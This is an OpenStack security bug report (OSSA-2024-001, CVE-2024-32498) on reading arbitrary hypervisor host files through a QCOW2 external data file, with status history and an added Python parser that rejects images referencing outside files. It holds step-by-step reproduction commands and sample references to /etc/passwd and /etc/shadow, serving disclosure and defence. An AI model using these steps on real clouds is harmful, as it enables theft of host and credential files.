[OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| Cinder | Fix Released | Critical | Brian Rosmaita | |
| Glance | Fix Released | Critical | Dan Smith | |
| OpenStack Compute (nova) | Fix Released | Critical | Sylvain Bauza | |
| OpenStack Security Advisory | Fix Released | High | Jeremy Stanley | |
| Ubuntu Cloud Archive | Fix Released | Undecided | Unassigned | |
| Antelope | Fix Released | Undecided | Unassigned | |
| Bobcat | Fix Released | Undecided | Unassigned | |
| Caracal | Fix Released | Undecided | Unassigned | |
| Ussuri | Fix Committed | Undecided | Unassigned | |
| Yoga | Fix Released | Undecided | Unassigned | |
Bug Description
OpenStack has a security vulnerability in Nova or Glance that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.
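The two host-file references the description mentions are both visible in the qcow2 header before any image is ever attached to a VM: the backing file name (the OSSA-2015-014 case) is pointed to by a fixed header field, and the external data file name lives in a header extension of type 0x44415441 ("DATA"), usually paired with bit 2 of `incompatible_features`. The following Python is an added example, not code from this bug report or from the Nova, Glance or Cinder projects: it builds a minimal qcow2 header in memory (the `build_qcow2` helper; the result is a header only, not a bootable image), parses the fixed header and the extension list, and implements the kind of pre-upload check an image service needs, rejecting any qcow2 that references a file outside itself. The paths `/etc/passwd` and `/etc/shadow` below are constructed sample values.

```python
import struct

# qcow2 on-disk constants, as defined in the QEMU qcow2 specification
QCOW_MAGIC = b"QFI\xfb"
EXT_END = 0x00000000            # terminates the header-extension list
EXT_DATA_FILE = 0x44415441      # "DATA": external data file name
INCOMPAT_DATA_FILE = 1 << 2     # incompatible_features bit 2: external data file
HEADER_FMT = ">4sIQIIQIIQQIIQ"  # the 72-byte header shared by v2 and v3
HEADER_V3_FMT = ">QQQII"        # the 32 extra bytes of a v3 header


def build_qcow2(backing_file=b"", data_file=b"", version=3):
    """Construct a minimal qcow2 header (demonstration only, not a usable image).

    Layout mirrors what qemu-img writes: fixed header, header extensions
    terminated by EXT_END, then the backing file name if any.
    """
    ext = b""
    if data_file:
        ext += struct.pack(">II", EXT_DATA_FILE, len(data_file)) + data_file
        ext += b"\0" * (-len(data_file) % 8)        # extensions are 8-byte aligned
    ext += struct.pack(">II", EXT_END, 0)
    header_len = 104 if version == 3 else 72
    backing_off = header_len + len(ext) if backing_file else 0
    fixed = struct.pack(
        HEADER_FMT, QCOW_MAGIC, version, backing_off, len(backing_file),
        16,          # cluster_bits (64 KiB clusters)
        1 << 20,     # virtual size: 1 MiB
        0,           # crypt_method
        1, 0x10000,  # l1_size, l1_table_offset
        0x20000, 1,  # refcount_table_offset, refcount_table_clusters
        0, 0)        # nb_snapshots, snapshots_offset
    if version == 3:
        incompat = INCOMPAT_DATA_FILE if data_file else 0
        fixed += struct.pack(HEADER_V3_FMT, incompat, 0, 0, 4, header_len)
    return fixed + ext + backing_file


def inspect_qcow2(img: bytes) -> dict:
    """Parse the qcow2 header and return the external references it carries."""
    if len(img) < 72 or img[:4] != QCOW_MAGIC:
        raise ValueError("not a qcow2 image")
    (_, version, backing_off, backing_len, _, size,
     *_rest) = struct.unpack(HEADER_FMT, img[:72])
    info = {"version": version, "virtual_size": size,
            "backing_file": None, "data_file": None, "incompatible_features": 0}
    if version == 3:
        incompat, _, _, _, header_len = struct.unpack(HEADER_V3_FMT, img[72:104])
        info["incompatible_features"] = incompat
    elif version == 2:
        header_len = 72                      # v2 has no header_length field
    else:
        raise ValueError(f"unsupported qcow2 version {version}")
    if backing_off and backing_len:
        name = img[backing_off:backing_off + backing_len]
        info["backing_file"] = name.decode("utf-8", errors="replace")
    # Walk the header-extension list that follows the fixed header.
    pos = header_len
    while pos + 8 <= len(img):
        ext_type, ext_len = struct.unpack(">II", img[pos:pos + 8])
        pos += 8
        if ext_type == EXT_END:
            break
        if ext_type == EXT_DATA_FILE:
            payload = img[pos:pos + ext_len]
            info["data_file"] = payload.decode("utf-8", errors="replace")
        pos += ext_len + (-ext_len % 8)      # skip payload plus alignment padding
    return info


def image_upload_check(img: bytes) -> list:
    """Return the reasons an image must be rejected; an empty list means it is safe.

    Any reference to a file outside the image is a host-side file read (or
    write, for the data file) once the image is processed on a hypervisor.
    """
    info = inspect_qcow2(img)
    reasons = []
    if info["backing_file"] is not None:
        reasons.append(f"backing file reference: {info['backing_file']!r}")
    if info["data_file"] is not None or info["incompatible_features"] & INCOMPAT_DATA_FILE:
        reasons.append(f"external data file reference: {info['data_file']!r}")
    return reasons


if __name__ == "__main__":
    samples = {
        "clean": build_qcow2(),
        "data_file": build_qcow2(data_file=b"/etc/passwd"),     # constructed sample
        "backing_file": build_qcow2(backing_file=b"/etc/shadow"),  # constructed sample
    }
    for label, img in samples.items():
        print(label, inspect_qcow2(img), image_upload_check(img) or "OK")
```

The check flags the data file both by the extension and by the feature bit, so a header that carries the extension without the bit set (for example a version 2 header) is still rejected. On a host, `qemu-img info` on the uploaded file reports the same references, which is the simplest way to confirm a finding from this parser.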
CVE References: CVE-2024-32498
Changed in cinder:
- status: New → In Progress
- importance: Undecided → Critical
- assignee: nobody → Brian Rosmaita (brian-rosmaita)

Changed in glance:
- status: New → In Progress
- importance: Undecided → Critical
- assignee: nobody → Dan Smith (danms)

Changed in nova:
- status: New → In Progress

Changed in ossa:
- status: Incomplete → Confirmed
- importance: Undecided → High
- assignee: nobody → Jeremy Stanley (fungi)
- status: Confirmed → Triaged

Changed in ossa:
- status: Triaged → In Progress
- summary: "Arbitrary file access through QCOW2 external data file" → "Arbitrary file access through QCOW2 external data file (CVE-2024-32498)"
- description: updated

Changed in nova:
- importance: Undecided → Critical
- assignee: nobody → Sylvain Bauza (sylvain-bauza)
- summary: "Arbitrary file access through QCOW2 external data file (CVE-2024-32498)" → "[OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)"
- description: updated
- information type: Private Security → Public Security

Changed in ossa:
- status: In Progress → Fix Released

Changed in nova:
- status: In Progress → Fix Released

Changed in cinder:
- status: In Progress → Fix Released

Changed in glance:
- status: In Progress → Fix Released
- tags: added: in-unmaintained-zed

Changed in cloud-archive:
- status: Fix Released → Fix Committed
Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.